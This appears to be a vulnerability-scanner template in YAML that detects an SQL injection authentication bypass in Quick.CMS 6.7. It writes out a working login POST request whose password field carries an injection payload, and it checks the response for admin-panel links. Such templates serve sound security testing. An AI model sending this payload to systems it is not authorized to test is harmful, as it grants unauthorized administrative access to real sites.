47 lines
1.3 KiB
YAML
47 lines
1.3 KiB
YAML
id: quick-cms-sqli
|
|
|
|
info:
|
|
name: Quick.CMS v6.7 - SQL Injection
|
|
author: Kazgangap
|
|
severity: high
|
|
description: |
|
|
Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/177657/Quick.CMS-6.7-SQL-Injection.html
|
|
- https://www.exploit-db.com/exploits/51910
|
|
classification:
|
|
cpe: cpe:2.3:a:opensolution:quick.cms:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: opensolution
|
|
product: quick.cms
|
|
fofa-query: body="Quick.Cms v6.7"
|
|
tags: packetstorm,quickcms,sqli,cms
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /admin.php?p=login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
sEmail=test%40test.net&sPass=%27+or+1%5D%2500&bAcceptLicense=1&iAcceptLicense=true
|
|
|
|
host-redirects: true
|
|
max-redirects: 2
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "Log out</a>"
|
|
- "Settings</a>"
|
|
- "Plugins</a>"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502206b2e59ee9501fd84cd6734593b1f0b34eacab1a54e2abb9e8c951d9cf2999af5022100c2622d7165f29d903844de099e79d55913b57dd6409642ec74d747a3cd99488a:922c64590222798bb761d5b6d8e72950 |